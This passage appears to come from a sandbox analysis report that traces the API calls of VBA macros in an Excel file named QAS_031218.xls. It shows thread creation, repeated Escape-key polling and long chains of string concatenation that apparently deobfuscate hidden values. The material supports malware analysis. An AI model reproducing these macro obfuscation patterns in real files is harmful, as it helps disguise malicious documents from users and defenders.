= 0x95c Thread: id = 18 os_tid = 0x958 Thread: id = 19 os_tid = 0x950 Thread: id = 20 os_tid = 0x94c Thread: id = 21 os_tid = 0x948 Thread: id = 22 os_tid = 0x944 Thread: id = 23 os_tid = 0x934 [0103.689] GetModuleFileNameA (in: hModule=0x65000000, lpFilename=0x185224, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA6\\VBE6.DLL" (normalized: "c:\\progra~2\\common~1\\micros~1\\vba\\vba6\\vbe6.dll")) returned 0x2f [0103.689] OaBuildVersion () returned 0x321396 [0103.714] _MsoVbaInitSecurity@4 () returned 0x33a4c38 [0104.215] GetFullPathNameA (in: lpFileName="C:\\Users\\kFT6uTQW\\Desktop\\QAS_031218.xls", nBufferLength=0x104, lpBuffer=0x1880c0, lpFilePart=0x18806c | out: lpBuffer="C:\\Users\\kFT6uTQW\\Desktop\\QAS_031218.xls", lpFilePart=0x18806c*="QAS_031218.xls") returned 0x28 [0104.636] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0104.636] DispCallFunc (pvInstance=0x50dffac, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x18e024) [0104.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x65001f64, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18d698 | out: lpThreadId=0x18d698*=0x9d8) returned 0x5e0 [0104.657] GetAsyncKeyState (vKey=27) returned 0 [0104.662] GetAsyncKeyState (vKey=27) returned 0 [0104.667] GetAsyncKeyState (vKey=27) returned 0 [0104.669] GetAsyncKeyState (vKey=27) returned 0 [0104.670] GetAsyncKeyState (vKey=27) returned 0 [0104.670] GetAsyncKeyState (vKey=27) returned 0 [0104.670] GetAsyncKeyState (vKey=27) returned 0 [0104.671] GetAsyncKeyState (vKey=27) returned 0 [0104.671] GetAsyncKeyState (vKey=27) returned 0 [0104.672] GetAsyncKeyState (vKey=27) returned 0 [0104.673] GetAsyncKeyState (vKey=27) returned 0 [0104.673] GetAsyncKeyState (vKey=27) returned 0 [0104.674] GetAsyncKeyState (vKey=27) returned 0 [0104.674] GetAsyncKeyState (vKey=27) returned 0 [0104.675] GetAsyncKeyState (vKey=27) returned 0 [0104.675] GetAsyncKeyState (vKey=27) returned 0 [0104.676] GetAsyncKeyState (vKey=27) returned 0 [0104.676] GetAsyncKeyState (vKey=27) returned 0 [0104.676] GetAsyncKeyState (vKey=27) returned 0 [0104.677] GetAsyncKeyState (vKey=27) returned 0 [0104.677] GetAsyncKeyState (vKey=27) returned 0 [0104.678] GetAsyncKeyState (vKey=27) returned 0 [0104.678] GetAsyncKeyState (vKey=27) returned 0 [0104.679] GetAsyncKeyState (vKey=27) returned 0 [0104.679] GetAsyncKeyState (vKey=27) returned 0 [0104.679] GetAsyncKeyState (vKey=27) returned 0 [0104.680] GetAsyncKeyState (vKey=27) returned 0 [0104.680] GetAsyncKeyState (vKey=27) returned 0 [0104.681] GetAsyncKeyState (vKey=27) returned 0 [0104.681] GetAsyncKeyState (vKey=27) returned 0 [0104.682] GetAsyncKeyState (vKey=27) returned 0 [0104.682] GetAsyncKeyState (vKey=27) returned 0 [0104.683] GetAsyncKeyState (vKey=27) returned 0 [0104.683] GetAsyncKeyState (vKey=27) returned 0 [0104.684] GetAsyncKeyState (vKey=27) returned 0 [0104.684] GetAsyncKeyState (vKey=27) returned 0 [0104.684] GetAsyncKeyState (vKey=27) returned 0 [0104.690] GetAsyncKeyState (vKey=27) returned 0 [0104.695] GetAsyncKeyState (vKey=27) returned 0 [0104.697] GetAsyncKeyState (vKey=27) returned 0 [0104.697] GetAsyncKeyState (vKey=27) returned 0 [0104.697] GetAsyncKeyState (vKey=27) returned 0 [0104.698] GetAsyncKeyState (vKey=27) returned 0 [0104.698] GetAsyncKeyState (vKey=27) returned 0 [0104.698] GetAsyncKeyState (vKey=27) returned 0 [0104.699] GetAsyncKeyState (vKey=27) returned 0 [0104.699] GetAsyncKeyState (vKey=27) returned 0 [0104.699] GetAsyncKeyState (vKey=27) returned 0 [0104.700] GetAsyncKeyState (vKey=27) returned 0 [0104.700] GetAsyncKeyState (vKey=27) returned 0 [0104.713] GetAsyncKeyState (vKey=27) returned 0 [0104.714] SafeArrayCreateEx (vt=0xc, cDims=0x1, rgsabound=0x18a490, pvExtra=0x0) returned 0x50fffa0 [0104.730] GetAsyncKeyState (vKey=27) returned 0 [0104.731] VarBstrFromI4 (in: lIn=8148432, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a2f8 | out: pbstrOut=0x18a2f8*="8148432") returned 0x0 [0104.732] VarBstrFromI4 (in: lIn=466786, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a300 | out: pbstrOut=0x18a300*="466786") returned 0x0 [0104.732] VarBstrFromI4 (in: lIn=8082641, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a2f4 | out: pbstrOut=0x18a2f4*="8082641") returned 0x0 [0104.732] VarBstrFromI4 (in: lIn=14141076, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a2f4 | out: pbstrOut=0x18a2f4*="14141076") returned 0x0 [0104.732] VarBstrFromI4 (in: lIn=891521, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a304 | out: pbstrOut=0x18a304*="891521") returned 0x0 [0104.732] VarBstrCat (in: bstrLeft="8", bstrRight="316833", pbstrResult=0x18a2e8 | out: pbstrResult=0x18a2e8) returned 0x0 [0104.733] VarBstrFromI4 (in: lIn=12530454, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a2f8 | out: pbstrOut=0x18a2f8*="12530454") returned 0x0 [0104.733] VarBstrFromI4 (in: lIn=1295120, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a304 | out: pbstrOut=0x18a304*="1295120") returned 0x0 [0104.733] VarBstrCat (in: bstrLeft="0", bstrRight="249408", pbstrResult=0x18a2e0 | out: pbstrResult=0x18a2e0) returned 0x0 [0104.733] VarBstrCat (in: bstrLeft="22", bstrRight="897218", pbstrResult=0x18a2e8 | out: pbstrResult=0x18a2e8) returned 0x0 [0104.733] VarBstrCat (in: bstrLeft="0", bstrRight="428504", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.733] VarBstrCat (in: bstrLeft="48", bstrRight="493037", pbstrResult=0x18a2e8 | out: pbstrResult=0x18a2e8) returned 0x0 [0104.757] GetAsyncKeyState (vKey=27) returned 0 [0104.758] VarBstrCat (in: bstrLeft="53", bstrRight="924374", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="0", bstrRight="880807", pbstrResult=0x18a2f0 | out: pbstrResult=0x18a2f0) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="25", bstrRight="735023", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="23", bstrRight="818407", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="141", bstrRight="673836", pbstrResult=0x18a2f0 | out: pbstrResult=0x18a2f0) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="37", bstrRight="250061", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="129", bstrRight="233849", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="63", bstrRight="824937", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="81", bstrRight="537579", pbstrResult=0x18a2f0 | out: pbstrResult=0x18a2f0) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="77", bstrRight="628780", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="139", bstrRight="62716", pbstrResult=0x18a2e0 | out: pbstrResult=0x18a2e0) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="11", bstrRight="64981", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="199", bstrRight="181293", pbstrResult=0x18a2e4 | out: pbstrResult=0x18a2e4) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="25", bstrRight="805194", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="0", bstrRight="236266", pbstrResult=0x18a2e0 | out: pbstrResult=0x18a2e0) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="51", bstrRight="405888", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="191", bstrRight="678073", pbstrResult=0x18a2e4 | out: pbstrResult=0x18a2e4) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="65", bstrRight="769862", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="111", bstrRight="16361", pbstrResult=0x18a2e0 | out: pbstrResult=0x18a2e0) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="91", bstrRight="705032", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.758] VarBstrCat (in: bstrLeft="151", bstrRight="191687", pbstrResult=0x18a2e4 | out: pbstrResult=0x18a2e4) returned 0x0 [0104.768] GetAsyncKeyState (vKey=27) returned 0 [0104.768] VarBstrFromI4 (in: lIn=23188702, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a32c | out: pbstrOut=0x18a32c*="23188702") returned 0x0 [0104.768] VarBstrCat (in: bstrLeft="108", bstrRight="34873", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.768] VarBstrCat (in: bstrLeft="16", bstrRight="708278", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.784] GetAsyncKeyState (vKey=27) returned 0 [0104.784] VarBstrFromI4 (in: lIn=8446068, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a318 | out: pbstrOut=0x18a318*="8446068") returned 0x0 [0104.784] VarBstrCat (in: bstrLeft="231", bstrRight="208939", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.784] VarBstrCat (in: bstrLeft="25", bstrRight="4411", pbstrResult=0x18a308 | out: pbstrResult=0x18a308) returned 0x0 [0104.784] VarBstrCat (in: bstrLeft="79", bstrRight="621984", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.784] VarBstrCat (in: bstrLeft="39", bstrRight="584868", pbstrResult=0x18a308 | out: pbstrResult=0x18a308) returned 0x0 [0104.809] GetAsyncKeyState (vKey=27) returned 0 [0104.809] VarBstrFromI4 (in: lIn=1248710, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a314 | out: pbstrOut=0x18a314*="1248710") returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="5", bstrRight="545612", pbstrResult=0x18a308 | out: pbstrResult=0x18a308) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="229", bstrRight="816469", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="19", bstrRight="85306", pbstrResult=0x18a308 | out: pbstrResult=0x18a308) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="233", bstrRight="316798", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="45", bstrRight="289210", pbstrResult=0x18a308 | out: pbstrResult=0x18a308) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="235", bstrRight="611708", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="59", bstrRight="696241", pbstrResult=0x18a308 | out: pbstrResult=0x18a308) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="182", bstrRight="683359", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="85", bstrRight="315432", pbstrResult=0x18a308 | out: pbstrResult=0x18a308) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="153", bstrRight="957212", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="99", bstrRight="565508", pbstrResult=0x18a308 | out: pbstrResult=0x18a308) returned 0x0 [0104.809] GetLocalTime (in: lpSystemTime=0x18a4c8 | out: lpSystemTime=0x18a4c8*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x3, wDay=0xe, wHour=0x2, wMinute=0x11, wSecond=0x1, wMilliseconds=0xd9)) [0104.809] VarDateFromUdate (in: pudateIn=0x18a4e4, dwFlags=0x0, pdateOut=0x18a4c8 | out: pdateOut=0x18a4c8) returned 0x0 [0104.809] VarBstrFromI4 (in: lIn=5966186, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a304 | out: pbstrOut=0x18a304*="5966186") returned 0x0 [0104.809] VarBstrFromI4 (in: lIn=40154194, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a304 | out: pbstrOut=0x18a304*="40154194") returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="59", bstrRight="218786", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="12", bstrRight="321136", pbstrResult=0x18a2e8 | out: pbstrResult=0x18a2e8) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="59", bstrRight="226222", pbstrResult=0x18a2e0 | out: pbstrResult=0x18a2e0) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="26", bstrRight="875523", pbstrResult=0x18a2e8 | out: pbstrResult=0x18a2e8) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="109", bstrRight="914553", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="52", bstrRight="920721", pbstrResult=0x18a2e8 | out: pbstrResult=0x18a2e8) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="31", bstrRight="886835", pbstrResult=0x18a2e0 | out: pbstrResult=0x18a2e0) returned 0x0 [0104.809] VarBstrCat (in: bstrLeft="66", bstrRight="323032", pbstrResult=0x18a2e8 | out: pbstrResult=0x18a2e8) returned 0x0 [0104.816] GetAsyncKeyState (vKey=27) returned 0 [0104.816] VarBstrFromI4 (in: lIn=49093, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a35c | out: pbstrOut=0x18a35c*="49093") returned 0x0 [0104.816] VarBstrCat (in: bstrLeft="4", bstrRight="314645", pbstrResult=0x18a340 | out: pbstrResult=0x18a340) returned 0x0 [0104.816] VarBstrCat (in: bstrLeft="243", bstrRight="387948", pbstrResult=0x18a338 | out: pbstrResult=0x18a338) returned 0x0 [0104.830] GetAsyncKeyState (vKey=27) returned 0 [0104.830] VarBstrFromI4 (in: lIn=7846380, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a310 | out: pbstrOut=0x18a310*="7846380") returned 0x0 [0104.830] VarBstrCat (in: bstrLeft="119", bstrRight="954519", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.830] VarBstrCat (in: bstrLeft="20", bstrRight="35631", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.830] VarBstrCat (in: bstrLeft="252", bstrRight="874993", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.830] VarBstrCat (in: bstrLeft="34", bstrRight="813111", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.830] VarBstrCat (in: bstrLeft="252", bstrRight="483964", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.846] GetAsyncKeyState (vKey=27) returned 0 [0104.846] VarBstrFromI4 (in: lIn=1587245, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a310 | out: pbstrOut=0x18a310*="1587245") returned 0x0 [0104.846] VarBstrCat (in: bstrLeft="236", bstrRight="481091", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.846] VarBstrCat (in: bstrLeft="558", bstrRight="394131", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.846] VarBstrCat (in: bstrLeft="78", bstrRight="286652", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.846] VarBstrCat (in: bstrLeft="47", bstrRight="419522", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.846] VarBstrCat (in: bstrLeft="31", bstrRight="254705", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.846] VarBstrCat (in: bstrLeft="28", bstrRight="139206", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.846] VarBstrCat (in: bstrLeft="45", bstrRight="769805", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.846] GetLocalTime (in: lpSystemTime=0x18a4c8 | out: lpSystemTime=0x18a4c8*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x3, wDay=0xe, wHour=0x2, wMinute=0x11, wSecond=0x1, wMilliseconds=0x108)) [0104.846] VarDateFromUdate (in: pudateIn=0x18a4e4, dwFlags=0x0, pdateOut=0x18a4c8 | out: pdateOut=0x18a4c8) returned 0x0 [0104.857] GetAsyncKeyState (vKey=27) returned 0 [0104.857] VarBstrFromI4 (in: lIn=12715180, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a31c | out: pbstrOut=0x18a31c*="12715180") returned 0x0 [0104.857] VarBstrCat (in: bstrLeft="127", bstrRight="325640", pbstrResult=0x18a2f4 | out: pbstrResult=0x18a2f4) returned 0x0 [0104.857] VarBstrCat (in: bstrLeft="236", bstrRight="652180", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.857] VarBstrCat (in: bstrLeft="85", bstrRight="324683", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.857] VarBstrCat (in: bstrLeft="14", bstrRight="3784", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.857] VarBstrCat (in: bstrLeft="84", bstrRight="639074", pbstrResult=0x18a2f4 | out: pbstrResult=0x18a2f4) returned 0x0 [0104.874] GetAsyncKeyState (vKey=27) returned 0 [0104.874] VarBstrFromI4 (in: lIn=227523, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a31c | out: pbstrOut=0x18a31c*="227523") returned 0x0 [0104.874] VarBstrCat (in: bstrLeft="9", bstrRight="973374", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.874] VarBstrCat (in: bstrLeft="31", bstrRight="410348", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.874] VarBstrCat (in: bstrLeft="35", bstrRight="370779", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.874] VarBstrCat (in: bstrLeft="81", bstrRight="922263", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.874] VarBstrCat (in: bstrLeft="49", bstrRight="173784", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.874] VarBstrCat (in: bstrLeft="110", bstrRight="666571", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.874] VarBstrCat (in: bstrLeft="75", bstrRight="703105", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.875] GetLocalTime (in: lpSystemTime=0x18a4c8 | out: lpSystemTime=0x18a4c8*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x3, wDay=0xe, wHour=0x2, wMinute=0x11, wSecond=0x1, wMilliseconds=0x118)) [0104.875] VarDateFromUdate (in: pudateIn=0x18a4e4, dwFlags=0x0, pdateOut=0x18a4c8 | out: pdateOut=0x18a4c8) returned 0x0 [0104.875] VarBstrFromI4 (in: lIn=7867143, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a318 | out: pbstrOut=0x18a318*="7867143") returned 0x0 [0104.875] VarBstrFromI4 (in: lIn=71611551, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a318 | out: pbstrOut=0x18a318*="71611551") returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="78", bstrRight="811729", pbstrResult=0x18a2f0 | out: pbstrResult=0x18a2f0) returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="720", bstrRight="274170", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="230", bstrRight="401596", pbstrResult=0x18a2f4 | out: pbstrResult=0x18a2f4) returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="213", bstrRight="929679", pbstrResult=0x18a2f0 | out: pbstrResult=0x18a2f0) returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="25", bstrRight="607449", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="150", bstrRight="440944", pbstrResult=0x18a2f4 | out: pbstrResult=0x18a2f4) returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="39", bstrRight="168291", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="153", bstrRight="775905", pbstrResult=0x18a2f0 | out: pbstrResult=0x18a2f0) returned 0x0 [0104.875] VarBstrCat (in: bstrLeft="65", bstrRight="558052", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.883] GetAsyncKeyState (vKey=27) returned 0 [0104.883] VarBstrCat (in: bstrLeft="0", bstrRight="118834", pbstrResult=0x18a2e0 | out: pbstrResult=0x18a2e0) returned 0x0 [0104.883] VarBstrCat (in: bstrLeft="231", bstrRight="454678", pbstrResult=0x18a2d0 | out: pbstrResult=0x18a2d0) returned 0x0 [0104.883] VarBstrCat (in: bstrLeft="8", bstrRight="906350", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.883] VarBstrCat (in: bstrLeft="189", bstrRight="573271", pbstrResult=0x18a2d4 | out: pbstrResult=0x18a2d4) returned 0x0 [0104.883] VarBstrCat (in: bstrLeft="17", bstrRight="187153", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.883] VarBstrCat (in: bstrLeft="169", bstrRight="814908", pbstrResult=0x18a2d4 | out: pbstrResult=0x18a2d4) returned 0x0 [0104.898] GetAsyncKeyState (vKey=27) returned 0 [0104.898] GetAsyncKeyState (vKey=27) returned 0 [0104.898] VarBstrFromI4 (in: lIn=18911895, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a318 | out: pbstrOut=0x18a318*="18911895") returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="126", bstrRight="802102", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="21", bstrRight="891753", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="58", bstrRight="748894", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="35", bstrRight="9245", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="78", bstrRight="375154", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="61", bstrRight="33175", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="122", bstrRight="585907", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="75", bstrRight="374439", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.898] VarBstrCat (in: bstrLeft="93", bstrRight="530215", pbstrResult=0x18a350 | out: pbstrResult=0x18a350) returned 0x0 [0104.898] GetLocalTime (in: lpSystemTime=0x18a4c8 | out: lpSystemTime=0x18a4c8*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x3, wDay=0xe, wHour=0x2, wMinute=0x11, wSecond=0x1, wMilliseconds=0x137)) [0104.898] VarDateFromUdate (in: pudateIn=0x18a4e4, dwFlags=0x0, pdateOut=0x18a4c8 | out: pdateOut=0x18a4c8) returned 0x0 [0104.907] GetAsyncKeyState (vKey=27) returned 0 [0104.907] VarBstrFromI4 (in: lIn=91584546, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a318 | out: pbstrOut=0x18a318*="91584546") returned 0x0 [0104.907] VarBstrCat (in: bstrLeft="11", bstrRight="79854", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.907] VarBstrCat (in: bstrLeft="31", bstrRight="902306", pbstrResult=0x18a2f0 | out: pbstrResult=0x18a2f0) returned 0x0 [0104.907] VarBstrCat (in: bstrLeft="25", bstrRight="95013", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.907] VarBstrCat (in: bstrLeft="39", bstrRight="550028", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.907] VarBstrCat (in: bstrLeft="31", bstrRight="583584", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.907] VarBstrCat (in: bstrLeft="972", bstrRight="705359", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.907] VarBstrCat (in: bstrLeft="16", bstrRight="856102", pbstrResult=0x18a2fc | out: pbstrResult=0x18a2fc) returned 0x0 [0104.907] VarBstrCat (in: bstrLeft="153", bstrRight="317618", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.907] GetLocalTime (in: lpSystemTime=0x18a4c8 | out: lpSystemTime=0x18a4c8*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x3, wDay=0xe, wHour=0x2, wMinute=0x11, wSecond=0x1, wMilliseconds=0x146)) [0104.907] VarDateFromUdate (in: pudateIn=0x18a4e4, dwFlags=0x0, pdateOut=0x18a4c8 | out: pdateOut=0x18a4c8) returned 0x0 [0104.921] GetAsyncKeyState (vKey=27) returned 0 [0104.921] VarBstrFromI4 (in: lIn=357800, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a2fc | out: pbstrOut=0x18a2fc*="357800") returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="135", bstrRight="639820", pbstrResult=0x18a2d8 | out: pbstrResult=0x18a2d8) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="993", bstrRight="812923", pbstrResult=0x18a2ec | out: pbstrResult=0x18a2ec) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="226", bstrRight="874782", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="241", bstrRight="402850", pbstrResult=0x18a2d8 | out: pbstrResult=0x18a2d8) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="30", bstrRight="629616", pbstrResult=0x18a2e4 | out: pbstrResult=0x18a2e4) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="132", bstrRight="925406", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="44", bstrRight="974440", pbstrResult=0x18a2e4 | out: pbstrResult=0x18a2e4) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="0", bstrRight="381751", pbstrResult=0x18a2d8 | out: pbstrResult=0x18a2d8) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="70", bstrRight="60245", pbstrResult=0x18a2e4 | out: pbstrResult=0x18a2e4) returned 0x0 [0104.922] VarBstrCat (in: bstrLeft="16", bstrRight="191294", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.923] GetAsyncKeyState (vKey=27) returned 0 [0104.923] VarBstrFromI4 (in: lIn=10634906, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a31c | out: pbstrOut=0x18a31c*="10634906") returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="20", bstrRight="445124", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="26", bstrRight="233089", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="153", bstrRight="905561", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="40", bstrRight="603132", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="129", bstrRight="756632", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="66", bstrRight="36776", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="0", bstrRight="340764", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="104", bstrRight="117085", pbstrResult=0x18a2f4 | out: pbstrResult=0x18a2f4) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="26", bstrRight="16463", 